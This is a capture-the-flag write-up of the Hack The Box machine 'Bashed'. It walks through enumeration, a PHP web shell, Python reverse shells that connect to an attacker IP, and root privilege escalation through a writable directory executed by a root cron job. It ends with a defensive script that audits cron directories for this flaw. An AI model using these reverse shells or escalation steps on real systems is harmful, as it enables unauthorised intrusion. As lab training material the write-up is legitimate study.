HTB - Bashed

Getting Root:
Start with nmap: port 80 is the only open port.
Using gobuster we discover a directory called /dev which contains a PHP web shell.
We get a reverse shell using python.
sudo -l shows that www-data can execute any command as scriptmanager without a password.
Used sudo -u to become scriptmanager and turn a python script in /scripts into a reverse shell, which a root cron job executes every minute.
Nmap
# Nmap 7.80 scan initiated Mon Mar 2 12:37:01 2020 as: nmap -sC -sV -p- -oA nmap/Bashed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.040s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Gobuster
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o Bashed_gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.68
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/02 12:50:38 Starting gobuster
===============================================================
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/images (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/02 12:56:42 Finished
===============================================================
Gobuster discovered a directory named /dev which contains a PHP web shell, giving command execution as www-data.


Getting a Reverse Shell
Using a python reverse shell, executed through the web shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Started the listener
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 57102
/bin/sh: 0: can't access tty; job control turned off
$
Improving the shell
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Using linpeas.sh, the following is very interesting: linpeas.sh GitHub: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
That means we can run any command as user scriptmanager, and NOPASSWD means no password is required:
www-data@bashed:/dev/shm$ sudo -u scriptmanager whoami
sudo -u scriptmanager whoami
scriptmanager
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager id
sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$
scriptmanager@bashed:/dev/shm$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
The user scriptmanager can access the /scripts directory (linpeas.sh listed it as writable, but www-data couldn't access it):
# output from linpeas.sh
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/dev/shm/linpeas.sh
/run/lock
/scripts
/scripts/test.py
There are two files there. Something is executing the test.py script with root privileges: if you mv test.txt test.bkp, after some time the file gets created again, owned by root.
# File named test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
# File named test.txt, OWNED by root even though test.py belongs to scriptmanager: whatever runs test.py runs as root
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$
# These are the file permissions in /scripts
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Mar 2 12:04 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rwxr--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Mar 2 11:07 test.txt
Since test.py is owned by scriptmanager (our user), you can modify it and check whether you get a reverse shell with root privileges. As you can see below, I reused the same python reverse shell I used to get user, only reformatted into a script and pointed at a different port.
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.20",9002))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
We get a shell as root
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 59522
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty;pty.spawn("/bin/bash")'
Investigating what was executing test.py in the /scripts directory, we noticed that root has a cron job that runs every python script in that directory once a minute. Since the loop picks up every *.py file and the directory is group-writable by scriptmanager, any script that user writes there runs as root:
root@bashed:/scripts# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
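The misconfiguration here is a root cron job that executes every *.py in a directory a non-root user can write to. The audit script below is an added example, not part of the original writeup or the box: it parses crontab lines, extracts the directories each command cd's into, and flags any directory or script there that a non-root uid or gid can write to. The sample crontab and file metadata are constructed to mirror the listing above (the Entry, SAMPLE_FS, audit_crontab and related names are my own; /opt/jobs is a hypothetical root-owned directory added for contrast); entry_from_fs and fs_lookup show how to point it at a live filesystem.

```python
import os
import re
import shlex
import stat
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Entry:
    """Stat-like view of a path: constructed by hand for the sample,
    or pulled from os.stat() by entry_from_fs() on a live system."""
    path: str
    uid: int
    gid: int
    mode: int        # permission bits only, e.g. 0o774 for drwxrwxr--
    is_dir: bool


def entry_from_fs(path: str) -> Entry:
    st = os.stat(path)
    return Entry(path, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode), stat.S_ISDIR(st.st_mode))


def fs_lookup(directory: str) -> List[Entry]:
    """Live lookup: the directory itself plus its direct children."""
    if not os.path.isdir(directory):
        return []
    return [entry_from_fs(directory)] + [
        entry_from_fs(os.path.join(directory, n)) for n in os.listdir(directory)]


def writable_by_non_root(e: Entry) -> bool:
    """True if some uid other than 0 can write e: world-writable,
    group-writable with a non-root group, or owner-writable with a non-root owner."""
    if e.mode & stat.S_IWOTH:
        return True
    if e.mode & stat.S_IWGRP and e.gid != 0:
        return True
    if e.mode & stat.S_IWUSR and e.uid != 0:
        return True
    return False


# five time fields, or an @reboot-style shortcut, followed by the command
CRON_RE = re.compile(r'^(?:(?:\S+\s+){5}|@\w+\s+)(.+)$')


def cron_command(line: str) -> Optional[str]:
    """Command part of a crontab line; None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith('#'):
        return None
    m = CRON_RE.match(line)
    return m.group(1) if m else None


def cd_targets(command: str) -> List[str]:
    """Absolute directories the command cd's into (`cd /x; ...`, `cd /x && ...`).
    Relative targets are skipped because cron's working directory is not known here."""
    targets = []
    for segment in re.split(r'[;&|]+', command):
        toks = shlex.split(segment)
        if len(toks) >= 2 and toks[0] == 'cd' and toks[1].startswith('/'):
            targets.append(toks[1])
    return targets


@dataclass
class Finding:
    line: str
    directory: str
    reason: str


def audit_cron_line(line: str, lookup: Callable[[str], List[Entry]]) -> List[Finding]:
    """Flag every entry under a cd'd directory that a non-root user could modify."""
    cmd = cron_command(line)
    if cmd is None:
        return []
    findings = []
    for d in cd_targets(cmd):
        for e in lookup(d):
            if writable_by_non_root(e):
                kind = 'directory' if e.is_dir else 'file'
                findings.append(Finding(line, d, f'{kind} {e.path} (uid {e.uid}, gid {e.gid}, '
                                                 f'mode {e.mode:o}) is writable by a non-root user'))
    return findings


# Constructed sample mirroring the writeup's listing of /scripts:
# drwxrwxr-- scriptmanager(1001) ., -rwxr--r-- test.py, -rw-r--r-- root test.txt
SAMPLE_FS = {
    '/scripts': [
        Entry('/scripts', 1001, 1001, 0o774, True),
        Entry('/scripts/test.py', 1001, 1001, 0o744, False),
        Entry('/scripts/test.txt', 0, 0, 0o644, False),
    ],
    '/opt/jobs': [                      # hypothetical root-owned directory for contrast
        Entry('/opt/jobs', 0, 0, 0o755, True),
        Entry('/opt/jobs/job.py', 0, 0, 0o744, False),
    ],
}

# Constructed root crontab: the third line is the one found on the box, the last is hypothetical.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# root crontab
* * * * * cd /scripts; for f in *.py; do python "$f"; done
*/5 * * * * cd /opt/jobs && python job.py
"""


def audit_crontab(text: str,
                  lookup: Callable[[str], List[Entry]] = lambda d: SAMPLE_FS.get(d, [])) -> List[Finding]:
    out: List[Finding] = []
    for line in text.splitlines():
        out.extend(audit_cron_line(line, lookup))
    return out


if __name__ == '__main__':
    for f in audit_crontab(SAMPLE_CRONTAB):          # runs against the constructed sample
        print(f'{f.directory}: {f.reason}')
    # on a live box: audit_crontab(open('/etc/crontab').read(), fs_lookup)
```

Against the sample it reports both the group-writable /scripts directory and the scriptmanager-owned test.py, and nothing for the root-owned /opt/jobs; a directory finding is the more important one, because the cron loop executes every *.py it finds, so an attacker does not even need an existing script to edit.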
If you want to learn a little bit more about crontab, check out this site below: